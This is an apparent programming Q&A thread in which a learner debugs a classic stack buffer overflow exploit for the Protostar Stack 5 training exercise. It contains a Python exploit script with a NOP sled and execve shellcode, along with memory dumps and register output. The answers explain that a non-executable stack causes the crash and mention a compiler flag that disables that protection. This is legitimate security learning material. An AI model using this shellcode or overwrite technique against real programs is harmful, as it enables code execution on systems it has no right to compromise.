# Segmentation fault on buffer buffer overflow

Tags: c, x86, segmentation-fault, buffer-overflow, exploit

I tried to learn how buffer overflow works and I did some exercises from exploit-exercises.com. I tried to solve Protostar Stack 5 problem. The code is writen in C. [Here](https://exploit-exercises.com/protostar/stack5/) is the code:

```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}
```

The buffer starts at `0xbffff770` and the return is located at `0xbffff7bc` so I have 76 byte space (`0xbffff7bc - 0xbffff770 = 0x4c = 76`) to put nop sled and shellcode. The shellcode size is 23 Byte, so I put 53 Byte of nop sled to my stack and I redirect the eip register in the middle of my nop sled which is `0x0xbffff770 + 16`. Here is my script to produce the exploit writen in python:

```
import struct

eip = struct.pack("I", 0xbffff770 + 16) 
nop = "\x90" * 53
payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89
           \xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

print nop + payload + eip
```

But after i run this exploit on the program, I got `Segmentetion Fault`. Can someone explain me why i got this error?

The memory after running the exploit:

```
0xbffff770: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff780: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff790: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff7a0: 0x90909090  0x50c03190  0x732f2f68  0x622f6868
0xbffff7b0: 0xe3896e69  0xe1895350  0x80cd0bb0  0xbffff780
```

The ret address is located at `0xbffff7bc` and directed to `0xbffff780` (which is nop sled), and the shellcode start from `0xbffff7a5` until `0xbffff7bc`

info register:

```
eax            0xbffff770   -1073744016
ecx            0xbffff770   -1073744016
edx            0xb7fd9334   -1208118476
ebx            0xb7fd7ff4   -1208123404
esp            0xbffff7bc   0xbffff7bc
ebp            0x80cd0bb0   0x80cd0bb0
esi            0x0  0
edi            0x0  0
eip            0x80483da    0x80483da <main+22>
eflags         0x200246 [ PF ZF IF ID ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0  0
gs             0x33 51
```

By the way, I tried to put the redirect ret address 5 times so I decreased the nop sled to 33 byte (`nop sled(33 byte) + shellcode(23 byte) + ret addr(4 byte * 5)`) and this worked, but why I get segfault at the first exploit. I do not understand why.

Comment: Can you de-obfuscate the code that you're trying to execute? My brain is a terrible disassembler; I don't have the binary-to-mnemonic tables memorized. What does the code look like in memory once you've modified it?

Comment: Updated :) @CodyGray

Comment: Did you try to inspect the instruction at eip = 0x80483da to make sure you were executing a ret as expected?

Comment: I am suspicious about how that happens. Do you execute your code on that website's provided iso's system?

Comment: This question has been answered in [Exploiting buffer overflow leads to segfault](https://security.stackexchange.com/questions/72653/exploiting-buffer-overflow-leads-to-segfault?newreg=8afd72fe81c14d3aae8352877af6c138)

Answer (score 1):

LTKills was most probably right saying "*This question has been answered in [Exploiting buffer overflow leads to segfault](https://security.stackexchange.com/questions/72653/exploiting-buffer-overflow-leads-to-segfault?newreg=8afd72fe81c14d3aae8352877af6c138)*", where the answer is:

> Your memory address 0xbffff…80 is most likely non-executable, but only read/write.

You can verify this e. g. with `/proc/…/maps`:

- start your C program without input, so that it waits for input
- suspend it with Ctrl-Z, or do the following from another terminal
- enter `` cat /proc/`pidof a.out`/maps `` (with the C program's name instead of `a.out`, if different)

You should see something similar to this:

```
08048000-08049000 r-xp 00000000 00:16 6723524   /home/armali/bin/so/c/a.out
08049000-0804a000 rw-p 00000000 00:16 6723524   /home/armali/bin/so/c/a.out
f7635000-f7636000 rw-p 00000000 00:00 0 
f7636000-f7774000 r-xp 00000000 08:08 371440    /lib/libc-2.11.3.so
f7774000-f7775000 ---p 0013e000 08:08 371440    /lib/libc-2.11.3.so
f7775000-f7777000 r--p 0013e000 08:08 371440    /lib/libc-2.11.3.so
f7777000-f7778000 rw-p 00140000 08:08 371440    /lib/libc-2.11.3.so
f7778000-f777b000 rw-p 00000000 00:00 0 
f7796000-f7799000 rw-p 00000000 00:00 0 
f7799000-f779a000 r-xp 00000000 00:00 0         [vdso]
f779a000-f77b5000 r-xp 00000000 08:08 371433    /lib/ld-2.11.3.so
f77b5000-f77b6000 r--p 0001b000 08:08 371433    /lib/ld-2.11.3.so
f77b6000-f77b7000 rw-p 0001c000 08:08 371433    /lib/ld-2.11.3.so
ff8fb000-ff910000 rw-p 00000000 00:00 0         [stack]
```

Here the `[stack]` segment is not executable (no `x` there).

Comment: You should probably mention that compiling with `gcc -zexecstack` will make the stack (and .data and heap) executable, changing from this more-secure default.